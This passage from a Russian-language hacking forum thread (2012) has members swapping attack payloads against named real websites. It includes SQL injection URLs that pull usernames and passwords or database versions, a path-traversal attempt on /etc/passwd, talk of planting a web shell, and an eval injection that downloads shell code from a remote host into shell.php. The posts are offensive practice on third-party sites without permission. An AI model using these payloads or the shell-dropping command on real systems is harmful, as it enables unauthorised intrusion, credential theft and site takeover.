Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    union+select+null,null,concat(username,password),null,null,null,nul l+from+users--
    Code:
    union+select+null,null,(username || ':' || password)x,null,null,null,nul l+from+users--
     
    #20681 cat1vo, 2 Jul 2012
    Last edited: 2 Jul 2012
    2 people like this.
  2. loskstyle

    loskstyle Banned

    Joined:
    2 Jul 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Но работает он только в версии с "suid".
     
  3. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Del msg
     
    #20683 Zed0x, 2 Jul 2012
    Last edited: 13 Jan 2014
  4. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Del msg
     
    #20684 Zed0x, 2 Jul 2012
    Last edited: 13 Jan 2014
  5. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    сори у меня чет в мозиле не было хз почему ))
    а в хроме есть
     
  6. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1
     
  7. Rootz

    Rootz Banned

    Joined:
    1 Jul 2012
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber :)
     
  8. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    566
    Likes Received:
    289
    Reputations:
    42
    Основы тут. Далее сам сообразишь, нужны начальные знания синтаксиса СУБД.
     
  9. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Нашел на неком сайте LFI

    Code:
     http://******.ru/book_php.php?id=adminpidaras.php 
    Пытаюсь крутить

    Code:
     http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd 
    Поставляю %00, и все-равно ошибка.
    Подскажите что я делаю не так?
     
  10. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Code:
    http://www.novstan.ru/search/?str=%')or(1)group%2F%2A%2A%2Fby(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))%23
     
    _________________________
    4 people like this.
  12. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Не Apache, а PHP
     
    1 person likes this.
  13. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    http://www.serdan.com/html/i_portals/index.php?p_origin=internal&p_name=content&p_id=MI-91
    Оракл, я не силен
     
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Там нет иньекции! Нашел на поддомене.
    PHP:
    http://intranet.serdan.com.co/DATAofertas/index.php?perfilId=2 union all select null,null,null,null-- 
    Version:
    User:
    Database:
     
    2 people like this.
  15. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Залил мини шелл. Все ок. PHPINFO показывает.

    Делаю запрос
    Ничего не показывает. Начал гуглить... Перекодировал адрес сайта в BASE64.
    Опять нет шелла(

    allow_url_fopen On
    allow_url_include Off
    file_uploads On
     
  16. КOT

    КOT Banned

    Joined:
    14 Jun 2012
    Messages:
    31
    Likes Received:
    6
    Reputations:
    2
    :confused:
     
  17. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Сделал так

    PHPINFO выводит через Base64, а шелл не льется опять :mad:
     
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to aydin-ka
    Если я правильно тебя понял, то $a = eval($_GET['a']);
    Code:
    http://site.com?index.php?a=file_put_contents("shell.php", file_get_contents("http://site/shell.txt")); 
     
    1 person likes this.
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,422
    Likes Received:
    817
    Reputations:
    851
    Изучи вот эти два топика:
    Должны помочь разобраться в твоем вопросе и болие.
     
    _________________________
    1 person likes this.
  20. WTSBugzoff

    WTSBugzoff New Member

    Joined:
    23 Jun 2011
    Messages:
    59
    Likes Received:
    2
    Reputations:
    0
    Подскажите как в vbulletin'е узнать название колонок и таблиц?
     
Loading...
Thread Status:
Not open for further replies.